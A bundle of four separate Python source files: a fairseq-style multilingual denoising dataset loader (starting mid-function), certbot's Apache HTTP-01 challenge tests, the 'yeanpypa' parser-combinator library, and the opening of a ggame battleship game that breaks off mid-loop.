self.args.tokens_per_sample - 2, # one less for <s>
pad=self.source_dictionary.pad(),
eos=end_token,
break_mode=self.args.sample_break_mode,
)
logger.info('loaded {} blocks from: {}'.format(len(dataset), split_path))
# prepend beginning-of-sentence token (<s>, equiv. to [CLS] in BERT)
dataset = PrependTokenDataset(dataset, self.source_dictionary.bos())
dataset = AppendTokenDataset(dataset, end_token)
lang_mask_whole_words = mask_whole_words if language not in language_without_segmentations else None
lang_dataset = DenoisingDataset(
dataset,
dataset.sizes,
self.dictionary,
self.mask_idx,
lang_mask_whole_words,
shuffle=self.args.shuffle_instance,
seed=self.seed,
args=self.args,
eos=None if not self.args.add_lang_token else self.source_dictionary.index('[{}]'.format(language)),
)
lang_datasets.append(lang_dataset)
dataset_lengths = np.array(
[len(d) for d in lang_datasets],
dtype=float,
)
logger.info(
'loaded total {} blocks for all languages'.format(
int(dataset_lengths.sum()),
)
)
if split == self.args.train_subset:
# For train subset, additionally up or down sample languages.
sample_probs = self._get_sample_prob(dataset_lengths)
logger.info(
"Sample probability by language: {}".format({
lang: "{0:.4f}".format(sample_probs[id])
for id, lang in enumerate(languages)
})
)
size_ratio = (sample_probs * dataset_lengths.sum()) / dataset_lengths
logger.info(
"Up/Down Sampling ratio by language: {}".format({
lang: "{0:.2f}".format(size_ratio[id])
for id, lang in enumerate(languages)
})
)
resampled_lang_datasets = [
ResamplingDataset(
lang_datasets[i],
size_ratio=size_ratio[i],
seed=self.args.seed,
epoch=epoch,
replace=size_ratio[i] >= 1.0,
)
for i, d in enumerate(lang_datasets)
]
dataset = ConcatDataset(
resampled_lang_datasets,
)
else:
dataset = ConcatDataset(lang_datasets)
lang_splits = [split]
for lang_id, lang_dataset in enumerate(lang_datasets):
split_name = split + '_' + languages[lang_id]
lang_splits.append(split_name)
self.datasets[split_name] = lang_dataset
if split in self.args.valid_subset:
self.args.valid_subset = self.args.valid_subset.replace(
split, ','.join(lang_splits)
)
with data_utils.numpy_seed(self.args.seed + epoch):
shuffle = np.random.permutation(len(dataset))
self.datasets[split] = SortDataset(
dataset,
sort_order=[
shuffle,
dataset.sizes,
],
)
| |
"""Test for certbot_apache._internal.http_01."""
import unittest
import errno
from typing import List
try:
import mock
except ImportError: # pragma: no cover
from unittest import mock # type: ignore
from acme import challenges
from certbot import achallenges
from certbot import errors
from certbot.compat import filesystem
from certbot.compat import os
from certbot.tests import acme_util
from certbot_apache._internal.parser import get_aug_path
import util
NUM_ACHALLS = 3
class ApacheHttp01Test(util.ApacheTest):
"""Test for certbot_apache._internal.http_01.ApacheHttp01."""
def setUp(self, *args, **kwargs): # pylint: disable=arguments-differ
super().setUp(*args, **kwargs)
self.account_key = self.rsa512jwk
self.achalls: List[achallenges.KeyAuthorizationAnnotatedChallenge] = []
vh_truth = util.get_vh_truth(
self.temp_dir, "debian_apache_2_4/multiple_vhosts")
# Takes the vhosts for encryption-example.demo, certbot.demo
# and vhost.in.rootconf
self.vhosts = [vh_truth[0], vh_truth[3], vh_truth[10]]
for i in range(NUM_ACHALLS):
self.achalls.append(
achallenges.KeyAuthorizationAnnotatedChallenge(
challb=acme_util.chall_to_challb(
challenges.HTTP01(token=((chr(ord('a') + i).encode() * 16))),
"pending"),
domain=self.vhosts[i].name, account_key=self.account_key))
modules = ["ssl", "rewrite", "authz_core", "authz_host"]
for mod in modules:
self.config.parser.modules["mod_{0}.c".format(mod)] = None
self.config.parser.modules[mod + "_module"] = None
from certbot_apache._internal.http_01 import ApacheHttp01
self.http = ApacheHttp01(self.config)
def test_empty_perform(self):
self.assertEqual(len(self.http.perform()), 0)
@mock.patch("certbot_apache._internal.configurator.ApacheConfigurator.enable_mod")
def test_enable_modules_apache_2_2(self, mock_enmod):
self.config.version = (2, 2)
del self.config.parser.modules["authz_host_module"]
del self.config.parser.modules["mod_authz_host.c"]
enmod_calls = self.common_enable_modules_test(mock_enmod)
self.assertEqual(enmod_calls[0][0][0], "authz_host")
@mock.patch("certbot_apache._internal.configurator.ApacheConfigurator.enable_mod")
def test_enable_modules_apache_2_4(self, mock_enmod):
del self.config.parser.modules["authz_core_module"]
del self.config.parser.modules["mod_authz_host.c"]
enmod_calls = self.common_enable_modules_test(mock_enmod)
self.assertEqual(enmod_calls[0][0][0], "authz_core")
def common_enable_modules_test(self, mock_enmod):
"""Tests enabling mod_rewrite and other modules."""
del self.config.parser.modules["rewrite_module"]
del self.config.parser.modules["mod_rewrite.c"]
self.http.prepare_http01_modules()
self.assertIs(mock_enmod.called, True)
calls = mock_enmod.call_args_list
other_calls = []
for call in calls:
if call[0][0] != "rewrite":
other_calls.append(call)
# If these lists are equal, we never enabled mod_rewrite
self.assertNotEqual(calls, other_calls)
return other_calls
def test_same_vhost(self):
vhost = next(v for v in self.config.vhosts if v.name == "certbot.demo")
achalls = [
achallenges.KeyAuthorizationAnnotatedChallenge(
challb=acme_util.chall_to_challb(
challenges.HTTP01(token=((b'a' * 16))),
"pending"),
domain=vhost.name, account_key=self.account_key),
achallenges.KeyAuthorizationAnnotatedChallenge(
challb=acme_util.chall_to_challb(
challenges.HTTP01(token=((b'b' * 16))),
"pending"),
domain=next(iter(vhost.aliases)), account_key=self.account_key)
]
self.common_perform_test(achalls, [vhost])
def test_anonymous_vhost(self):
vhosts = [v for v in self.config.vhosts if not v.ssl]
achalls = [
achallenges.KeyAuthorizationAnnotatedChallenge(
challb=acme_util.chall_to_challb(
challenges.HTTP01(token=((b'a' * 16))),
"pending"),
domain="something.nonexistent", account_key=self.account_key)]
self.common_perform_test(achalls, vhosts)
def test_configure_multiple_vhosts(self):
vhosts = [v for v in self.config.vhosts if "duplicate.example.com" in v.get_names()]
self.assertEqual(len(vhosts), 2)
achalls = [
achallenges.KeyAuthorizationAnnotatedChallenge(
challb=acme_util.chall_to_challb(
challenges.HTTP01(token=((b'a' * 16))),
"pending"),
domain="duplicate.example.com", account_key=self.account_key)]
self.common_perform_test(achalls, vhosts)
def test_configure_name_and_blank(self):
domain = "certbot.demo"
vhosts = [v for v in self.config.vhosts if v.name == domain or v.name is None]
achalls = [
achallenges.KeyAuthorizationAnnotatedChallenge(
challb=acme_util.chall_to_challb(
challenges.HTTP01(token=((b'a' * 16))),
"pending"),
domain=domain, account_key=self.account_key),
]
self.common_perform_test(achalls, vhosts)
def test_no_vhost(self):
for achall in self.achalls:
self.http.add_chall(achall)
self.config.config.http01_port = 12345
self.assertRaises(errors.PluginError, self.http.perform)
def test_perform_1_achall_apache_2_2(self):
self.combinations_perform_test(num_achalls=1, minor_version=2)
def test_perform_1_achall_apache_2_4(self):
self.combinations_perform_test(num_achalls=1, minor_version=4)
def test_perform_2_achall_apache_2_2(self):
self.combinations_perform_test(num_achalls=2, minor_version=2)
def test_perform_2_achall_apache_2_4(self):
self.combinations_perform_test(num_achalls=2, minor_version=4)
def test_perform_3_achall_apache_2_2(self):
self.combinations_perform_test(num_achalls=3, minor_version=2)
def test_perform_3_achall_apache_2_4(self):
self.combinations_perform_test(num_achalls=3, minor_version=4)
def test_activate_disabled_vhost(self):
vhosts = [v for v in self.config.vhosts if v.name == "certbot.demo"]
achalls = [
achallenges.KeyAuthorizationAnnotatedChallenge(
challb=acme_util.chall_to_challb(
challenges.HTTP01(token=((b'a' * 16))),
"pending"),
domain="certbot.demo", account_key=self.account_key)]
vhosts[0].enabled = False
self.common_perform_test(achalls, vhosts)
matches = self.config.parser.find_dir(
"Include", vhosts[0].filep,
get_aug_path(self.config.parser.loc["default"]))
self.assertEqual(len(matches), 1)
def combinations_perform_test(self, num_achalls, minor_version):
"""Test perform with the given achall count and Apache version."""
achalls = self.achalls[:num_achalls]
vhosts = self.vhosts[:num_achalls]
self.config.version = (2, minor_version)
self.common_perform_test(achalls, vhosts)
def common_perform_test(self, achalls, vhosts):
"""Tests perform with the given achalls."""
challenge_dir = self.http.challenge_dir
self.assertIs(os.path.exists(challenge_dir), False)
for achall in achalls:
self.http.add_chall(achall)
expected_response = [
achall.response(self.account_key) for achall in achalls]
self.assertEqual(self.http.perform(), expected_response)
self.assertIs(os.path.isdir(self.http.challenge_dir), True)
self.assertIs(filesystem.has_min_permissions(self.http.challenge_dir, 0o755), True)
self._test_challenge_conf()
for achall in achalls:
self._test_challenge_file(achall)
for vhost in vhosts:
matches = self.config.parser.find_dir("Include",
self.http.challenge_conf_pre,
vhost.path)
self.assertEqual(len(matches), 1)
matches = self.config.parser.find_dir("Include",
self.http.challenge_conf_post,
vhost.path)
self.assertEqual(len(matches), 1)
self.assertIs(os.path.exists(challenge_dir), True)
@mock.patch("certbot_apache._internal.http_01.filesystem.makedirs")
def test_failed_makedirs(self, mock_makedirs):
mock_makedirs.side_effect = OSError(errno.EACCES, "msg")
self.http.add_chall(self.achalls[0])
self.assertRaises(errors.PluginError, self.http.perform)
def _test_challenge_conf(self):
with open(self.http.challenge_conf_pre) as f:
pre_conf_contents = f.read()
with open(self.http.challenge_conf_post) as f:
post_conf_contents = f.read()
self.assertIn("RewriteEngine on", pre_conf_contents)
self.assertIn("RewriteRule", pre_conf_contents)
self.assertIn(self.http.challenge_dir, post_conf_contents)
if self.config.version < (2, 4):
self.assertIn("Allow from all", post_conf_contents)
else:
self.assertIn("Require all granted", post_conf_contents)
def _test_challenge_file(self, achall):
name = os.path.join(self.http.challenge_dir, achall.chall.encode("token"))
validation = achall.validation(self.account_key)
self.assertIs(filesystem.has_min_permissions(name, 0o644), True)
with open(name, 'rb') as f:
self.assertEqual(f.read(), validation.encode())
if __name__ == "__main__":
unittest.main() # pragma: no cover
| |
"""
Parsing framework in Python, similar to pyparsing and boost::spirit
Author: Markus Brueckner (dev@slash-me.net)
License: This code is in the public domain
FAQ:
What's 'yeanpypa' anyway?
YEt ANother PYthon PArser framework. Virtually perfectly creative acronym...
"""
import logging
class InputReader(object):
"""
The InputReader serves as an abstraction to read chars from a
string with a state. The reader provides tools to save the current
reading position and a stack to set checkpoints where to return to
later.
"""
def __init__(self, string, ignore_white):
"""
Create this reader with the given string.
@param string: The string the reader reads from.
@type string: str
@param ignore_white: Whether to ignore whitespaces or not.
@type ignore_white: boolean
"""
self.__current_pos = 0
self.__stack = []
self.__string = string
self.__ignore_white = ignore_white
def getPos(self):
"""
Return the current position of this reader
@return: the current position of the reader in the string
"""
return self.__current_pos
def skipWhite(self):
"""
Function to skip the whitespace characters from the current position on.
"""
while (self.__current_pos < len(self.__string) and self.__string[self.__current_pos].isspace()):
self.__current_pos += 1
def getString(self,length):
"""
Get a substring of the string from this reader and advance the reader's position.
This method returns the current substring of the reader with the given length.
Note that even if ignore_whitespace is True, the string will return any containing
whitespaces.
@param length: The length of the string to return
@type length: int
@return: A substring of the given length.
"""
if self.__ignore_white:
self.skipWhite()
if self.__current_pos+length > len(self.__string):
raise EndOfStringException()
start = self.__current_pos
self.__current_pos += length
return self.__string[start:self.__current_pos]
def getChar(self):
"""
Get a single character from the string.
This methdo returns the next character of the string. If ignore_whitespace
is True, this will be the next non-whitespace character.
@return: The next character of the string.
"""
if self.__current_pos == len(self.__string):
raise EndOfStringException()
if self.__ignore_white:
self.skipWhite()
logging.debug("Getting char at position %d" % self.__current_pos)
logging.debug("Getting char at position %d" % self.__current_pos)
char = self.__string[self.__current_pos]
self.__current_pos += 1
return char
def checkPoint(self):
"""
Set a checkpoint in the reader. A checkpoint is kind of like a safety net where
the parser can return to later if parsin failed at any later point in the string.
The checkpoints are managed in a stack-like fashion: the parser can always return
to the last checkpoint set.
"""
self.__stack.append(self.__current_pos)
def rollback(self):
"""
Rollback the parser to the last checkpoint set. This is called
by the rules internally whenever parsing fails and a rollback
is necessary.
"""
if len(self.__stack) == 0:
raise EmptyStackException()
self.__current_pos = self.__stack[-1]
self.__stack = self.__stack[:-1]
def deleteCheckpoint(self):
"""
Delete the newest checkpoint without rolling back. If a rules
sucessfully matches, it deletes the previously saved
checkpoint to clean up the parser stack
"""
if len(self.__stack) == 0:
raise EmptyStackException()
self.__stack = self.__stack[:-1]
def fullyConsumed(self):
"""
Return whether the string was fully consumed
@return: True if the string was read to the last byte, False otherwise
"""
return len(self.__string) == self.__current_pos
def getIgnoreState(self):
"""
Return whether the reader is set to ignore whitespaces.
@return: True if the reader currently ignores whitespaces, False otherwise.
"""
return self.__ignore_white
def setIgnoreState(self, state):
"""
Set the ignore state of the reader. This call tells the reader whether it should ignore whitespaces or not.
@param state: True to ignore whitespace, False to return them
@type state: boolean
"""
self.__ignore_white = state
class ParseException(Exception):
"""
An exception thrown on parser error. This exception is thrown by
the parser in case of a non-correctable error. It contains a human
readable message that further explains the reason of the
exception.
"""
def __init__(self, msg):
"""
Initialize the exception with the given message.
@param msg: The message further describing the reason for this exception.
@type msg: str
"""
self.__msg = msg
def __str__(self):
"""
Return a human readable representation of this exceptions
@return: a human readable representation of the exception.
"""
return "ParseException: %s" % self.__msg
class EndOfStringException(Exception):
"""
Exception used internally by the InputReader to signal the end of
the input string.
"""
pass
class ParseResult(object):
"""
The class representing the result of a parser run. An object of
this class is returned by the parse() function. The ParseResult
contains information about whether the parsing fully consumed the
string and a list of token generated by the parser.
"""
def __init__(self, input_reader, token):
"""
Initialize the result object with the input reader and the token list.
@param input_reader: The InputReader used by the parser.
@type input_reader: InputReader
@param token: The list of tokens generated by the parser.
@type token: list
"""
self.__input_reader = input_reader
self.__token = token
def full(self):
"""
Check whether the input was fully consumed.
@return True if the input was fully consumed, False otherwise.
"""
return self.__input_reader.fullyConsumed()
def getTokens(self):
"""
Return the list of token generated by the parser.
@return: A list of token generated by the parser.
"""
return self.__token
class Rule(object):
"""
The basic entity of a grammar: the rule. This class doesn't
provide any parsing functionality on it's own. It merely provides
some basic functions shared by all Rule classes.
"""
action = None
hide_token = False
def match(input_reader):
"""
Match the given rule in the string from the given position on.
@param input_reader: The InputReader to read the input from.
@type input_reader: InputReader
@return: a list of token the rule matched.
"""
pass
def __add__(self, second_rule):
"""
Define an operator to concat two rules. The expressivness of
the 'pseudo-language' defined by the framework heavily relies
on operator overloading. The +-operator serves as a 'followed
by' expression.
@param second_rule: The right operand of the +-operator which
follows this object in grammar terms.
@type second_rule: Rule
@return An AndRule-object connecting these two rule appropriately.
"""
return AndRule(self, second_rule)
def __or__(self, second_rule):
"""
Define an operator to concat two rules via OR. The
expressivness of the 'pseudo-language' defined by the
framework heavily relies on operator overloading. The
|-operator serves as a 'OR' expression, defining two
alternative matches.
@param second_rule: The right operand of the +-operator which
follows this object in grammar terms.
@type second_rule: Rule
@return An OrRule-object connecting these two rule appropriately.
"""
return OrRule(self, second_rule)
def setAction(self, action):
"""
Set the action to execute on a rule match. Action may be any callable
that takes a one parameter. The parameter is a list of token the rule
matched. The action may manipulate the token returned by returning
a different token list.
@param action: The callable to execute if the rule matched.
@type action: Callable
@return: a reference to the rule itself
"""
self.action = action
return self
def callAction(self, param):
"""
Call the action attached to this rule. The given parameter is passed to
the action.
@param param: The parameter (token list) to pass to the action.
@type param: list
"""
if self.action:
if isinstance(param, list):
return self.action(param)
else:
return self.action([param])
else:
return param
def hide(self):
"""
Tell this rule to not produce any token output. The rule
matches its token as normal but does not return any of them
@return self
"""
self.hide_token = True
return self
def returnToken(self, token):
"""
Helper function encapsulating the hide()-functionality. This method
returns the token if self.hide is False and None otherwise.
@param token: The toden to return
@return: token if self.hide==False, None otherwise
"""
if self.hide_token:
return None
else:
return token
class Literal(Rule):
"""
Rule matching a certain string. The rule matches a given string. The string
matches the len(string) next characters, regardless if the input reader
should ignored whitespaces or not.
"""
def __init__(self, string):
"""
Initialize the rule with the string to match.
@param string: The string this rule instance should match.
@type string: str
"""
self.__string = string
def __str__(self):
"""
Return a string representation of this rule.
@return: a string representation of this rule.
"""
return "\"%s\"" % self.__string
def match(self, input_reader):
"""
Match this rule against the input.
@param input_reader: The input reader to read the string from.
@type input_reader: InputReader
@return: The matched string.
"""
input_reader.checkPoint()
try:
string = input_reader.getString(len(self.__string))
if string != self.__string:
input_reader.rollback()
raise ParseException("Expected '%s' at position %d. Got '%s'" % (self.__string, input_reader.getPos(), string))
except EndOfStringException:
input_reader.rollback()
raise ParseException("Expected '%s' at end of string" % self.__string)
input_reader.deleteCheckpoint()
logging.debug("Matched \"%s\"" % self)
return self.returnToken(self.callAction([self.__string]))
class AnyOf(Rule):
"""
A class to match chars from a charset. The class matches exactly one of the chars from
the given charset. Whitespaces are matched depending on the setting of the input reader.
Note that if the input reader is set to ignore whitespaces, they will not be matched even
if the charset contains a whitespace character.
"""
def __init__(self, set):
"""
Initialize the object with a given set.
@param set: the charset this rule should match
@type set: str
"""
self.__set = set
def __str__(self):
"""
Return a human readable representation of the rule.
@return: A string describing the rule
"""
return "AnyOf(%s)" % self.__set
def match(self, input_reader):
"""
Match a character from the input. Depending on the setting of the input reader, the next
character ist matched directly or the next non-whitespace character is matched.
@param input_reader: The input to read from.
@type input_reader: InputReader
@return: The matched character
"""
input_reader.checkPoint()
char = ''
try:
char = input_reader.getChar()
if not (char in self.__set):
input_reader.rollback()
raise ParseException("Expected char from: [%s] at %d" % (self.__set, input_reader.getPos()))
except EndOfStringException:
input_reader.rollback()
raise ParseException("Expected char from: [%s] at %d" % (self.__set, input_reader.getPos()))
input_reader.deleteCheckpoint()
logging.debug("Matched %s" % char)
return self.returnToken(self.callAction([char]))
class NoneOf(Rule):
"""
Match if the next character is NOT in the given set.
"""
def __init__(self, set):
"""
Initialize the rule with the given set.
@param set: The char set the rule should NOT match on.
@type set: str
"""
self.__set = set
def __str__(self):
"""
Return a human readable representation of the rule.
@return A string describing the rule
"""
return "NoneOf(%s)" % self.__set
def match(self, input_reader):
"""
Match the rule against the input.
@param input_reader: The input reader to read the next character from.
@type input_reader: InputReader
@return: The matched char not in the set.
"""
input_reader.checkPoint()
char = ''
try:
char = input_reader.getChar()
if char in self.__set:
input_reader.rollback()
raise ParseException("Expected char not from: [%s] at %d" % (self.__set, input_reader.getPos()))
except EndOfStringException:
input_reader.rollback()
raise ParseException("Expected char not from: [%s] at %d" % (self.__set, input_reader.getPos()))
input_reader.deleteCheckpoint()
logging.debug("Matched %s" % char)
return self.returnToken(self.callAction([char]))
class AndRule(Rule):
"""
Two or more rules matching directly after each other. This rule
concats two or more subrules matching directly after each other in
the input. The class is not to be used directly, but merely is
created by the +-operator of the Rule class.
"""
def __init__(self, left_rule, right_rule):
"""
Create the rule object with two sub-rules.
@param left_rule: The left subrule of the +-operator creating this object.
@type left_rule: Rule
@param right_rule: The right subrule of the +-operator creating this object.
@type right_rule: Rule
"""
self.__subrules = [left_rule, right_rule]
def __str__(self):
"""
Return a human-readable representation of the rule object.
@return a string describing this rule.
"""
return "(%s)" % ' '.join(map(str, self.__subrules))
def __add__(self, right_rule):
"""
Add another subrule to this object. The +-operator from Rule is overwritten in
order to concat all subsequent subrules into one single object.
@param right_rule: The right rule of the +-operator. This object is added as a subrule to self.
@type right_rule: Rule
"""
self.__subrules.append(right_rule)
return self
def match(self, input_reader):
"""
Match the input against all subrules. The rule as a whole
matches if all subrules sucessfully match.
@param input_reader: The input reader where to read the input from.
@type input_reader: InputReader
@return: A list of token matched by that rule
"""
retval = []
try:
input_reader.checkPoint()
for rule in self.__subrules:
result = rule.match(input_reader)
if result != None:
retval.append(result)
input_reader.deleteCheckpoint()
except ParseException:
input_reader.rollback()
raise
return self.returnToken(self.callAction(retval))
# TODO: implement a greedy version of the OR rule (matches the longer match of the two)
class OrRule(Rule):
"""
A set of alternative rules. This object matches one of the
alternative subrules contained in it. The rules are matched in
left-to-right order. Matching stops after a rule matches.
This class is not intended for direct use. It is created by the
|-operator of the Rule class.
"""
def __init__(self, left_rule, right_rule):
"""
Initialize this rule with two subrules.
@param left_rule: The left operand of the creating |-operator.
@type left_rule: Rule
@param right_rule: The right operand of the creating |-operator
@type right_rule: Rule
"""
self.__subrules = [left_rule, right_rule]
def __str__(self):
"""
Return a human readable representation of that rule.
@return: The string representation of that rule.
"""
return "(%s)" % ' | '.join(map(str, self.__subrules))
def __or__(self, right_rule):
"""
Reimplementation of the |-operator to concat subsequent rules into one
object. This serves the purpose of simplifying the structure of the
resulting parser.
@param right_rule: The right operand of the |-operator.
@type right_rule: Rule
@return: self
"""
self.__subrules.append(right_rule)
return self
def match(self, input_reader):
"""
Match the subrules of this rule against the input. The matching is done
in left-to-right order and stops after the first match.
@param input_reader: The input reader to read characters from.
@type input_reader: InputReader
@return: A list of token matched by the first matching subrule.
"""
input_reader.checkPoint()
for rule in self.__subrules:
try:
rule_match = rule.match(input_reader)
input_reader.deleteCheckpoint()
return self.returnToken(self.callAction(rule_match))
except ParseException:
pass
input_reader.rollback()
raise ParseException("None of the subrules of %s matched." % str(self))
# TODO: unclear semantic
# class Not(Rule):
# """Negate the outcome of a rule
# Note: This does not consume any chars. It merely tells whether
# the given rule would match at this point
# """
# __rule = None
# def __init__(self, rule):
# self.__rule = rule
# def __str__(self):
# return "!%s" % self.__rule
# def match(self, input_reader):
# match = False
# try:
# input_reader.checkPoint()
# self.__rule.match(input_reader)
# input_reader.rollback()
# match = True
# except ParseException:
# input_reader.rollback()
# if match:
# input_reader.rollback()
# raise ParseException("Would not expect rule to match at %d" % input_reader.getPos())
# input_reader.deleteCheckpoint()
class Optional(Rule):
"""
This rule matches its subrule optionally once. If the subrule does
not match, the Optional() rule matches anyway.
"""
def __init__(self, rule):
"""
Initialize the rule with a subrule.
@param rule: The rule to match optionally
@type rule: Rule
"""
self.__rule = rule
def __str__(self):
"""
Return a string representation of this rule.
@return: a human readable representation of this rule.
"""
return "[ %s ]" % str(self.__rule)
def match(self, input_reader):
"""
Match this rule against the input.
@param input_reader: The input reader to read from.
@type input_reader: InputReader
@return A list of token matched by the subrule (or None, if none)
"""
try:
rule_match = self.__rule.match(input_reader)
logging.debug("Matched %s" % self)
return self.returnToken(self.callAction(rule_match))
except ParseException:
pass
class OneOrMore(Rule):
"""
Match a rule once or more. This rule matches its subrule at least
once or as often as possible.
"""
def __init__(self, rule):
"""
Initialize the rule with the appropriate subrule.
@param rule: The subrule to match.
@type rule: Rule
"""
self.__rule = rule
def __str__(self):
"""
Return a human-readable representation of the rule.
@return: A string describing this rule.
"""
return "{ %s }1" % str(self.__rule)
def match(self, input_reader):
"""
Match the rule against the input. The rule will try to match
as many bytes as possible from the input against the
subrule. It matches successfully, if the subrule matches at
least once.
@param input_reader: The input reader to read from.
@type input_reader: InputReader
@return: A list of token generated by the subrule.
"""
retval = []
retval.append(self.__rule.match(input_reader))
try:
while True:
retval.append(self.__rule.match(input_reader))
except ParseException:
pass
return self.returnToken(self.callAction(retval))
class Combine(Rule):
"""
Pseudo rule that recursivly combines all of it's children into one token.
This rule is useful if the token of a group of subrules should be combined
to form one string.
"""
def __init__(self, rule):
"""
Initialize the rule with a subrule. The token generated by
the subrule are recursivly combined into one string.
@param rule: The subrule to combine.
@type rule: Rule
"""
self.__rule = rule
def __str__(self):
"""
Return a human-readable description of the rule.
@return: A string describing this rule.
"""
return "Combine(%s)" % str(self.__rule)
def combine(self, token):
"""
Recursivly combine all token into a single one. This is an internal helper that
recursivly combines a list of lists (or strings) into one string.
@param token: the token list to combine into one string.
@type token: list or str
"""
if token==None:
return None
retval = ''
for tok in token:
if isinstance(tok, list):
retval+=self.combine(tok)
else:
retval+=tok
return retval
def match(self, input_reader):
"""
Match this rule against the input. The rule matches the input
against its subrule and combines the resulting token into a
string.
@param input_reader: The input reader to read from.
@type input_reader: InputReader
@return: A string combining all the token generated by the subrule.
"""
retval = self.combine(self.__rule.match(input_reader))
return self.returnToken(self.callAction(retval))
def Word(param):
"""
a shortcut for Combine(MatchWhite(OneOrMore(AnyOf(string)))) or
Combine(MatchWhite(OneOrMore(param))) (depending on the type of
param). See there for further details.
"""
if isinstance(param, str):
return Combine(MatchWhite(OneOrMore(AnyOf(param))))
else:
return Combine(MatchWhite(OneOrMore(param)))
class ZeroOrMore(Rule):
"""
Match a rule ad infinitum. This rule is similar to the Optional()
rule. While this one only matches if the subrule matches 0 or 1
times, the ZeroOrMore rule matches at any time. This rule tries to
consume as much input as possible.
"""
def __init__(self, rule):
"""
Initialize this rule with a subrule. The subrule is
transformed to a Optional(OneOrMore(rule)) construct.
@param rule: The subrule to match.
@type rule: Rule
"""
self.__rule = Optional(OneOrMore(rule))
def __str__(self):
"""
Return a human readable representation of the rule.
@return A description of this rule.
"""
return "{ %s }" % str(self.__rule)
def match(self, input_reader):
"""
Match the input against the subrule.
@param input_reader: The input reader to read from.
@type input_reader: InputReader
@return: A list of token generated by the matching of the subrule.
"""
retval = self.__rule.match(input_reader)
return self.returnToken(self.callAction(retval))
class IgnoreWhite(Rule):
"""
A pseudo-rule to tell the parser to temporary ignore
whitespaces. This rule itself does not match anything. It merely
sets the input reader into 'ignore whitespace' mode and returns
the token produced by its subrule. After executing the subrule,
the ignore state of the input reader is reset (i.e. if it was
'ignore' before, it will be afterwards, if it was 'match', it will
be that).
"""
def __init__(self, rule):
"""
Initialize the rule with a subrule.
@param rule: The subrule to match.
@type rule: Rule
"""
self.__rule = rule
def __str__(self):
"""
Return a human-readable representation of this rule.
@return: A string describing this rule.
"""
return "IgnoreWhite(%s)" % str(self.__rule)
def match(self, input_reader):
"""
Match the input against this rule. The input reader is set to
'ignore whitespace' mode, the subrule is matched, the ignore
state of the input reader is reset and the result of the
subrule is returned.
@param input_reader: The input reader to read any input from.
@type input_reader: InputReader
@return: The results of the subrule.
"""
ignore = input_reader.getIgnoreState()
input_reader.setIgnoreState(True)
try:
result = self.__rule.match(input_reader)
except:
input_reader.setIgnoreState(ignore)
raise
input_reader.setIgnoreState(ignore)
return self.returnToken(self.callAction(result))
class MatchWhite(Rule):
"""
A pseudo-rule to tell the parser to temporary match
whitespaces. This rule is the counterpart of the IgnoreWhite
rule. It sets the input reader into 'match whitespace' mode and
matches the given subrule.
"""
def __init__(self, rule):
"""
Initialize this rule with a subrule.
@param rule: The rule to match as a subrule.
@type rule: Rule
"""
self.__rule = rule
def __str__(self):
"""
Return a human-readable description of the rule.
@return: A human-readable description of this rule.
"""
return "MatchWhite(%s)" % str(self.__rule)
def match(self, input_reader):
"""
Match this rule against the input. The rule sets the input
reader into 'match whitespace' mode, matches the subrule,
resets the ignore state and returns the results of the
subrule.
@param input_reader: The input reader to read input from.
@type input_reader: InputReader
@return: A list of token generated by the subrule.
"""
ignore = input_reader.getIgnoreState()
input_reader.setIgnoreState(False)
# skip the trailing whitespace before the subrule matches.
input_reader.skipWhite()
try:
result = self.__rule.match(input_reader)
except:
input_reader.setIgnoreState(ignore)
raise
input_reader.setIgnoreState(ignore)
return self.returnToken(self.callAction(result))
class CallbackParser(Rule):
"""
A class calling a function for the next input character to
determine a match. This class calls a user-supplied function for
the next input character in order to determine whether the
character should match or not.
"""
def __init__(self, callback):
"""
Initialize the object with a callback. The callback takes a
single character as parameter and returns True if it should
match and False otherwise:
@param callback: The callback function determining the match.
@type callback: Callable
"""
self.__callback = callback
def __str__(self):
"""
Return a human-readable description of the rule.
@return: A human-readable description of this rule.
"""
return "CallbackParser(%s)" % str(self.__callback.__name__)
def match(self, input_reader):
"""
Match this rule against the input. The rule calls the callback
to determine whether the next character should match or not
and returns the character if so.
@param input_reader: The input reader to read input from.
@type input_reader: InputReader
@return: The matched character, if any.
"""
input_reader.checkPoint()
try:
char = input_reader.getChar()
except EndOfStringException:
input_reader.rollback()
raise ParseException('Preliminary end of string')
if self.__callback(char):
input_reader.deleteCheckpoint()
return self.returnToken(self.callAction([char]))
else:
input_reader.rollback()
raise ParseException('Character did not match %s' % str(self))
class ErrorRule(Rule):
"""
A rule triggering a parse exception. This class is not intended
to be used directly. Use the predefined variable error instead.
"""
def __str__(self):
"""
Return a human-readable description of the rule.
@return: A human-readable description of this rule.
"""
return "ErrorRule()"
def match(self, input_reader):
"""
Raise a parse exception. Since the only purpose of this rule is
to raise an exception, this method does not read anything but throws
an error immediately.
"""
raise ParseException('Hit ErrorRule()')
alpha = CallbackParser(lambda char: char.isalpha())
digit = CallbackParser(lambda char: char.isdigit())
integer = Word(digit).setAction(lambda i: int(i))
hexdigit = AnyOf('0123456789abcdefABCDEF')
error = ErrorRule()
def parse(parser, string, ignore_white=True):
"""
The main parse function. Call this function to parse an input
string with a given grammar. The parse function will save you from
setting up the appropriate input reader and parse result.
@param parser: The entry point to the grammar defined by Rule objects as provided by the framework.
@type parser: Rule
@param string: The input string to parse.
@type string: str
@param ignore_white: The ignore state of the input reader. True if the input reader should ignore whitespaces, False otherwise.
@type ignore_white: boolean
@return: A ParseResult object containing the results of the parsing of the input string.
"""
input_reader = InputReader(string, ignore_white)
tokens = parser.match(input_reader)
return ParseResult(input_reader, tokens)
| |
from ggame import App, RectangleAsset, ImageAsset, Sprite, LineStyle, Color, Frame
from random import randrange
black = Color(0x000000, 1.0)
blue = Color(0x2D9FC2,1.0)
white = Color(0xFFFFFF, 1.0)
red = Color(0xFC5D5D,1.0)
grey = Color(0x858585,1.0)
thinline = LineStyle(1, black)
celld = 35
rectangle3 = RectangleAsset(celld, celld, thinline, red)
rectangle = RectangleAsset(celld, celld, thinline, blue)
rectangle2 = RectangleAsset(celld, celld, thinline, white)
rectangle4 = RectangleAsset(celld, celld, thinline, black)
rectangle5 = RectangleAsset(celld, celld, thinline, grey)
ocean = {}
oceanself = {}
enemyBoats = {}
selfBoats = {}
selfBoatsalive = {}
enemyboatsalive = {}
enemyboatsunk = {}
selfBoatssunk = {}
cpushots = {}
length = 5
height = 10
width = 10
overlapping = True
shipsmadevisible = 0
shooting = False
class cell(Sprite):
def __init__(self, asset, position):
super().__init__(asset, position)
self.visible = True
class enemyships(Sprite):
def __init__(self, asset, position):
super().__init__(asset, position)
self.visible = False
for x in range(0, height):
for y in range(0, width):
#screen one set up
